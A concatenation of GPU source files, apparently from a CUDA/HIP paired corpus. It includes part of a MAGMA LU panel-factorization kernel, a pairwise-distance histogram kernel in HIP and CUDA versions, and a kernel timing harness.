sreg; // read dA += bx * ldda + tx; #pragma unroll for(int i = 0; i < NPAGES-1; i++){ rA[i] = dA[ i * TX ]; } if( tx < m_){ rA[NPAGES-1] = dA[ (NPAGES-1) * TX ]; } // main loop #pragma unroll for(int i = 0; i < n; i++){ // icamax and write pivot for the ith thread block if(bx == i){ rx_max = rx = (tx < i) ? 
MAGMA_C_ZERO : rA[0]; rx_abs_max = rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); max_id = rx_id = tx; #pragma unroll for(int j = 1; j < NPAGES; j++){ rx = rA[j]; rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = j * TX + tx; } } sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; __syncthreads(); // let the first warp do the final reduction step if(tx < 32){ #pragma unroll for(int j = 0; j < TX; j+= 32){ rx = sx[ j + tx ]; rx_abs = sabs[ j + tx ]; rx_id = smax_id[ j + tx ]; if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = rx_id; } } magmablas_syncwarp(); sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; magmablas_syncwarp(); #pragma unroll for(int j = 0; j < 32; j++){ rx = sx[j]; rx_abs = sabs[j]; rx_id = smax_id[j]; if ( rx_abs > rx_abs_max ){ rx_abs_max = rx_abs; rx_max = rx; max_id = rx_id; } } } if(tx == 0){ sx[ 0 ] = rx_max; sabs[ 0 ] = rx_abs_max; smax_id[ 0 ] = max_id; } __syncthreads(); rx_max = sx[ 0 ]; rx_abs_max = sabs[ 0 ]; max_id = smax_id[ 0 ]; __syncthreads(); // now every thread in the i^th block has the maximum if( tx == 0){ if( rx_abs_max == MAGMA_D_ZERO){ magmablas_iatomic_exchange( (magma_int_t*)info, (magma_int_t)(max_id + gbstep + 1) ); } magmablas_iatomic_exchange((magma_int_t*)&ipiv[i], (magma_int_t)(max_id+1) ); // fortran indexing } __syncthreads(); if( rx_abs_max == MAGMA_D_ZERO )return; } else{ // other thread blocks are waiting if(tx == 0){ max_id = 0; while( max_id == 0 ){ max_id = ipiv[i]; }; smax_id[ 0 ] = max_id; } __syncthreads(); max_id = smax_id[ 0 ]; max_id -= 1; // revert fortran indexing __syncthreads(); if( (*info) != 0 ) return; } // swap // swap always happens between page 0 and page x // to avoid spilling rA to local memory, we use shared memory if( max_id != i){ // all blocks swap in registers // for bx < i, the column is already written in memory, // but we have a copy in reg., so continue to swap in reg., // and do one final write to memory #pragma unroll for(int j = 0; j < NPAGES; j++){ if( j == (max_id/TX) ){ sx[ tx ] = rA[j]; __syncthreads(); if( tx == i ){ magmaFloatComplex tmp = sx[ max_id%TX ]; sx[ max_id%TX ] = rA[0]; rA[0] = tmp; } __syncthreads(); if( tx == max_id%TX ){ rA[j] = sx[ tx ]; } __syncthreads(); } } //__syncthreads(); } // the ith block does scal if(bx == i){ magmaFloatComplex reg = MAGMA_C_DIV(MAGMA_C_ONE, rx_max ); // scal if( tx > i ){ rA[0] *= reg; } #pragma unroll for(int j = 1; j < NPAGES; j++){ rA[j] *= reg; } // write column i to global memory #pragma unroll for(int j = 0; j < NPAGES-1; j++){ dA[ j * TX ] = rA[j]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } __threadfence(); __syncthreads(); // after cuda 9.0, both are needed, not sure why if(tx == 0) magmablas_iatomic_exchange( (int *)&update_flag[ i ], 1); } // thread blocks with ID larger than i perform ger if(bx > i){ if( tx == i ){ sreg = rA[0]; } // wait for scal if( tx == 0){ flag = 0; while( flag == 0 ){ flag = update_flag[ i ]; }; } __syncthreads(); magmaFloatComplex reg = sreg; if( NPAGES == 1){ if(tx > i && tx < m_){ rA[0] -= da[ i * ldda + tx ] * reg; } }else{ if(tx > i){ rA[0] -= da[ i * ldda + tx ] * reg; } } #pragma unroll for(int j = 1; j < NPAGES-1; j++){ rA[j] -= da[ i * ldda + j * TX + tx ] * reg; } if( NPAGES > 1){ if( tx < m_ ){ rA[ NPAGES-1 ] -= da[ i * ldda + (NPAGES-1)*TX + tx ] * reg; } } } } // all blocks write their columns again except the last one if( bx < n-1 ){ #pragma unroll 
for(int i = 0; i < NPAGES-1; i++){ dA[ i * TX ] = rA[i]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } } } // ============================================================================= extern "C" magma_int_t magma_cgetf2_native_fused( magma_int_t m, magma_int_t n, magmaFloatComplex_ptr dA, magma_int_t ldda, magma_int_t *ipiv, magma_int_t gbstep, magma_int_t *flags, magma_int_t *info, magma_queue_t queue ) { magma_int_t arginfo = 0; const magma_int_t ntx = CGETF2_FUSED_NTH; if( m < n || m > CGETF2_FUSED_MAX_M ){ arginfo = -1; } else if( n > magma_getdevice_multiprocessor_count() ){ arginfo = -2; } else if( ldda < max(1, m) ){ arginfo = -4; } if (arginfo != 0) { magma_xerbla( __func__, -(arginfo) ); return arginfo; } magma_int_t arch = magma_getdevice_arch(); dim3 grid(n, 1, 1); dim3 threads(ntx, 1, 1); const magma_int_t npages = magma_ceildiv(m, ntx); // the kernel uses communication among thread blocks // as a safeguard, force one thread block per multiprocessor // by allocating more than half the shared memory magma_int_t shmem = magma_getdevice_shmem_block(); shmem = (shmem / 2); int *update_flag = (int*) flags; // update_flag is an int, not magma_int_t cgetf2_native_init_kernel<<< 1, max(n,npages), 0, queue->cuda_stream() >>>( n, npages, ipiv, update_flag); // The case statement should cover up to ( xGETF2_CHAIN_MAX_M / ntx ) switch(npages){ case 1: cgetf2_native_kernel< ntx, 1><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 2: cgetf2_native_kernel< ntx, 2><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 3: cgetf2_native_kernel< ntx, 3><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 4: cgetf2_native_kernel< ntx, 4><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 5: cgetf2_native_kernel< ntx, 5><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 6: cgetf2_native_kernel< ntx, 6><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 7: cgetf2_native_kernel< ntx, 7><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 8: cgetf2_native_kernel< ntx, 8><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 9: cgetf2_native_kernel< ntx, 9><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 10: cgetf2_native_kernel< ntx, 10><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 11: cgetf2_native_kernel< ntx, 11><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 12: cgetf2_native_kernel< ntx, 12><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 13: cgetf2_native_kernel< ntx, 13><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 14: cgetf2_native_kernel< ntx, 14><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 15: cgetf2_native_kernel< ntx, 15><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, 
info); break; case 16: cgetf2_native_kernel< ntx, 16><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 17: cgetf2_native_kernel< ntx, 17><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 18: cgetf2_native_kernel< ntx, 18><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 19: cgetf2_native_kernel< ntx, 19><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 20: cgetf2_native_kernel< ntx, 20><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #if defined(PRECISION_s) || defined(PRECISION_d) case 21: cgetf2_native_kernel< ntx, 21><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 22: cgetf2_native_kernel< ntx, 22><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 23: cgetf2_native_kernel< ntx, 23><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 24: cgetf2_native_kernel< ntx, 24><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 25: cgetf2_native_kernel< ntx, 25><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 26: cgetf2_native_kernel< ntx, 26><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 27: cgetf2_native_kernel< ntx, 27><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 28: cgetf2_native_kernel< ntx, 28><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 29: cgetf2_native_kernel< ntx, 29><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 30: cgetf2_native_kernel< ntx, 30><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 31: cgetf2_native_kernel< ntx, 31><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 32: cgetf2_native_kernel< ntx, 32><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 33: cgetf2_native_kernel< ntx, 33><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 34: cgetf2_native_kernel< ntx, 34><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 35: cgetf2_native_kernel< ntx, 35><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 36: cgetf2_native_kernel< ntx, 36><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 37: cgetf2_native_kernel< ntx, 37><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 38: cgetf2_native_kernel< ntx, 38><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 39: cgetf2_native_kernel< ntx, 39><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, 
ipiv, gbstep, update_flag, info); break; case 40: cgetf2_native_kernel< ntx, 40><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 41: cgetf2_native_kernel< ntx, 41><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 42: cgetf2_native_kernel< ntx, 42><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 43: cgetf2_native_kernel< ntx, 43><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 44: cgetf2_native_kernel< ntx, 44><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 45: cgetf2_native_kernel< ntx, 45><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 46: cgetf2_native_kernel< ntx, 46><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 47: cgetf2_native_kernel< ntx, 47><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 48: cgetf2_native_kernel< ntx, 48><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 49: cgetf2_native_kernel< ntx, 49><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 50: cgetf2_native_kernel< ntx, 50><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) || defined(PRECISION_d) #if defined(PRECISION_s) case 51: cgetf2_native_kernel< ntx, 51><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 52: cgetf2_native_kernel< ntx, 52><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 53: cgetf2_native_kernel< ntx, 53><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 54: cgetf2_native_kernel< ntx, 54><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 55: cgetf2_native_kernel< ntx, 55><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 56: cgetf2_native_kernel< ntx, 56><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 57: cgetf2_native_kernel< ntx, 57><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 58: cgetf2_native_kernel< ntx, 58><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 59: cgetf2_native_kernel< ntx, 59><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 60: cgetf2_native_kernel< ntx, 60><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 61: cgetf2_native_kernel< ntx, 61><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 62: cgetf2_native_kernel< ntx, 62><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 63: cgetf2_native_kernel< ntx, 63><<<grid, 
threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 64: cgetf2_native_kernel< ntx, 64><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 65: cgetf2_native_kernel< ntx, 65><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 66: cgetf2_native_kernel< ntx, 66><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 67: cgetf2_native_kernel< ntx, 67><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 68: cgetf2_native_kernel< ntx, 68><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 69: cgetf2_native_kernel< ntx, 69><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 70: cgetf2_native_kernel< ntx, 70><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 71: cgetf2_native_kernel< ntx, 71><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 72: cgetf2_native_kernel< ntx, 72><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 73: cgetf2_native_kernel< ntx, 73><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 74: cgetf2_native_kernel< ntx, 74><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 75: cgetf2_native_kernel< ntx, 75><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 76: cgetf2_native_kernel< ntx, 76><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 77: cgetf2_native_kernel< ntx, 77><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 78: cgetf2_native_kernel< ntx, 78><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 79: cgetf2_native_kernel< ntx, 79><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 80: cgetf2_native_kernel< ntx, 80><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) default: printf("size not supported \n"); } return 0; }
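The long switch over npages in both versions of this file exists because NPAGES is a template parameter: the number of register "pages" each thread caches must be fixed at compile time, so the runtime page count magma_ceildiv(m, ntx) is mapped onto one of the pre-instantiated kernels. The sketch below shows that runtime-to-compile-time dispatch pattern in isolation; kernel_npages and launch_by_pages are illustrative names and the kernel body is a stand-in, not MAGMA's factorization.

#include <cstdio>
#include <cuda_runtime.h>

// A stand-in kernel: each thread keeps NPAGES values in registers, so NPAGES must be a
// compile-time constant (register arrays cannot be sized at run time).
template <int NPAGES>
__global__ void kernel_npages(const float *in, float *out, int m)
{
    float r[NPAGES];
    int tx = threadIdx.x;
    for (int p = 0; p < NPAGES; ++p) {
        int idx = p * blockDim.x + tx;
        r[p] = (idx < m) ? in[idx] : 0.0f;
    }
    for (int p = 0; p < NPAGES; ++p) {
        int idx = p * blockDim.x + tx;
        if (idx < m) out[idx] = 2.0f * r[p];   // placeholder work on the cached values
    }
}

// Map a runtime page count onto the matching template instantiation.
void launch_by_pages(int npages, const float *in, float *out, int m, int ntx, cudaStream_t stream)
{
    switch (npages) {
        case 1: kernel_npages<1><<<1, ntx, 0, stream>>>(in, out, m); break;
        case 2: kernel_npages<2><<<1, ntx, 0, stream>>>(in, out, m); break;
        case 3: kernel_npages<3><<<1, ntx, 0, stream>>>(in, out, m); break;
        default: printf("size not supported \n");   // mirrors the fallback above
    }
}

Extending the supported range is then just a matter of adding cases, which is exactly what the precision-guarded case blocks above do.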
bf6854918321a6e5cabb9d8840b3cc8ae451822d.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "includes.h" /* ================================================================== Programmers: Kevin Wagner Elijah Malaby John Casey Omptimizing SDH histograms for input larger then global memory ================================================================== */ #define BOX_SIZE 23000 /* size of the data box on one dimension */ /* descriptors for single atom in the tree */ typedef struct atomdesc { float x_pos; float y_pos; float z_pos; } atom; unsigned long long * histogram; /* list of all buckets in the histogram */ unsigned long long PDH_acnt; /* total number of data points */ int block_size; /* Number of threads per block */ int num_buckets; /* total number of buckets in the histogram */ float PDH_res; /* value of w */ atom * atom_list; /* list of all data points */ unsigned long long * histogram_GPU; unsigned long long * temp_histogram_GPU; atom * atom_list_GPU; __device__ void block_to_block (atom * block_a, atom * block_b, int b_length, unsigned long long * histogram, float resolution) { atom me = block_a[threadIdx.x]; for(int i = 0; i < b_length; i++) atomicAdd(&(histogram[(int)(sqrt((me.x_pos - block_b[i].x_pos) * (me.x_pos - block_b[i].x_pos) + (me.y_pos - block_b[i].y_pos) * (me.y_pos - block_b[i].y_pos) + (me.z_pos - block_b[i].z_pos) * (me.z_pos - block_b[i].z_pos)) / resolution)]), 1); } __global__ void GPUKernelFunction (unsigned long long PDH_acnt, float PDH_res, atom * atom_list_GPU, unsigned long long * histogram_GPU, int num_buckets) { extern __shared__ unsigned long long SHist[]; /* assign register values */ int i, h_pos; float dist; atom * my_block = &atom_list_GPU[blockIdx.x * blockDim.x]; atom temp_atom_1 = my_block[threadIdx.x]; for(h_pos=threadIdx.x; h_pos < num_buckets; h_pos+=blockDim.x) SHist[h_pos] = 0; __syncthreads(); /* loop through all points in atom list calculating distance from current point to all further points */ for (i = threadIdx.x + 1; i < blockDim.x && i+blockIdx.x*blockDim.x < PDH_acnt; i++) { atom temp_atom_2 = my_block[i]; dist = sqrt((temp_atom_1.x_pos - temp_atom_2.x_pos) * (temp_atom_1.x_pos - temp_atom_2.x_pos) + (temp_atom_1.y_pos - temp_atom_2.y_pos) * (temp_atom_1.y_pos - temp_atom_2.y_pos) + (temp_atom_1.z_pos - temp_atom_2.z_pos) * (temp_atom_1.z_pos - temp_atom_2.z_pos)); h_pos = (int)(dist / PDH_res); atomicAdd(&(SHist[h_pos]), 1); } __syncthreads(); for(i=blockIdx.x+1; i < gridDim.x-1; i++) block_to_block(my_block, &atom_list_GPU[i*blockDim.x], blockDim.x, SHist, PDH_res); block_to_block(my_block, &atom_list_GPU[i*blockDim.x], PDH_acnt-i*blockDim.x, // Last block may be small SHist, PDH_res); __syncthreads(); for(h_pos = threadIdx.x; h_pos < num_buckets; h_pos += blockDim.x) *(histogram_GPU+(num_buckets*blockIdx.x)+h_pos) += SHist[h_pos]; }
bf6854918321a6e5cabb9d8840b3cc8ae451822d.cu
#include "includes.h" /* ================================================================== Programmers: Kevin Wagner Elijah Malaby John Casey Omptimizing SDH histograms for input larger then global memory ================================================================== */ #define BOX_SIZE 23000 /* size of the data box on one dimension */ /* descriptors for single atom in the tree */ typedef struct atomdesc { float x_pos; float y_pos; float z_pos; } atom; unsigned long long * histogram; /* list of all buckets in the histogram */ unsigned long long PDH_acnt; /* total number of data points */ int block_size; /* Number of threads per block */ int num_buckets; /* total number of buckets in the histogram */ float PDH_res; /* value of w */ atom * atom_list; /* list of all data points */ unsigned long long * histogram_GPU; unsigned long long * temp_histogram_GPU; atom * atom_list_GPU; __device__ void block_to_block (atom * block_a, atom * block_b, int b_length, unsigned long long * histogram, float resolution) { atom me = block_a[threadIdx.x]; for(int i = 0; i < b_length; i++) atomicAdd(&(histogram[(int)(sqrt((me.x_pos - block_b[i].x_pos) * (me.x_pos - block_b[i].x_pos) + (me.y_pos - block_b[i].y_pos) * (me.y_pos - block_b[i].y_pos) + (me.z_pos - block_b[i].z_pos) * (me.z_pos - block_b[i].z_pos)) / resolution)]), 1); } __global__ void GPUKernelFunction (unsigned long long PDH_acnt, float PDH_res, atom * atom_list_GPU, unsigned long long * histogram_GPU, int num_buckets) { extern __shared__ unsigned long long SHist[]; /* assign register values */ int i, h_pos; float dist; atom * my_block = &atom_list_GPU[blockIdx.x * blockDim.x]; atom temp_atom_1 = my_block[threadIdx.x]; for(h_pos=threadIdx.x; h_pos < num_buckets; h_pos+=blockDim.x) SHist[h_pos] = 0; __syncthreads(); /* loop through all points in atom list calculating distance from current point to all further points */ for (i = threadIdx.x + 1; i < blockDim.x && i+blockIdx.x*blockDim.x < PDH_acnt; i++) { atom temp_atom_2 = my_block[i]; dist = sqrt((temp_atom_1.x_pos - temp_atom_2.x_pos) * (temp_atom_1.x_pos - temp_atom_2.x_pos) + (temp_atom_1.y_pos - temp_atom_2.y_pos) * (temp_atom_1.y_pos - temp_atom_2.y_pos) + (temp_atom_1.z_pos - temp_atom_2.z_pos) * (temp_atom_1.z_pos - temp_atom_2.z_pos)); h_pos = (int)(dist / PDH_res); atomicAdd(&(SHist[h_pos]), 1); } __syncthreads(); for(i=blockIdx.x+1; i < gridDim.x-1; i++) block_to_block(my_block, &atom_list_GPU[i*blockDim.x], blockDim.x, SHist, PDH_res); block_to_block(my_block, &atom_list_GPU[i*blockDim.x], PDH_acnt-i*blockDim.x, // Last block may be small SHist, PDH_res); __syncthreads(); for(h_pos = threadIdx.x; h_pos < num_buckets; h_pos += blockDim.x) *(histogram_GPU+(num_buckets*blockIdx.x)+h_pos) += SHist[h_pos]; }
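In the histogram pair above, each block accumulates a privatized copy of the histogram in shared memory (SHist) and then adds it into its own num_buckets-wide slice of histogram_GPU; the host or device code that folds those per-block slices into one final histogram is not part of these files. The kernel below is a hedged sketch of that missing reduction, assuming the slice layout implied by histogram_GPU + (num_buckets * blockIdx.x) + h_pos; reduce_histograms is an illustrative name.

#include <cuda_runtime.h>

// Fold the per-block partial histograms into a single final histogram.
// Assumes per_block holds num_blocks consecutive slices of num_buckets counters,
// matching the histogram_GPU indexing used in the kernel above (sketch, not original code).
__global__ void reduce_histograms(const unsigned long long *per_block,
                                  unsigned long long *final_hist,
                                  int num_blocks, int num_buckets)
{
    int bucket = blockIdx.x * blockDim.x + threadIdx.x;
    if (bucket >= num_buckets) return;
    unsigned long long sum = 0;
    for (int b = 0; b < num_blocks; ++b)
        sum += per_block[b * num_buckets + bucket];
    final_hist[bucket] = sum;
}

It could be launched with one thread per bucket, for example a grid of (num_buckets + 255) / 256 blocks of 256 threads.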
1e463580780e705d4f396e1f13c81224cbc1f276.hip
// !!! This is a file automatically generated by hipify!!! #include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <hiprand/hiprand_kernel.h> #include <stdlib.h> #include <hip/hip_runtime.h> #include <sys/time.h> #include "vector_atan2.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { hipSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const int n = 1; const REAL *x = NULL; hipMalloc(&x, XSIZE*YSIZE); const int offset_x = 1; const int stride_x = 1; const REAL *y = NULL; hipMalloc(&y, XSIZE*YSIZE); const int offset_y = 1; const int stride_y = 1; REAL *z = NULL; hipMalloc(&z, XSIZE*YSIZE); const int offset_z = 1; const int stride_z = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); hipFree(0);hipLaunchKernelGGL(( vector_atan2), dim3(gridBlock),dim3(threadBlock), 0, 0, n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); hipDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {hipLaunchKernelGGL(( vector_atan2), dim3(gridBlock),dim3(threadBlock), 0, 0, n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {hipLaunchKernelGGL(( vector_atan2), dim3(gridBlock),dim3(threadBlock), 0, 0, n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
1e463580780e705d4f396e1f13c81224cbc1f276.cu
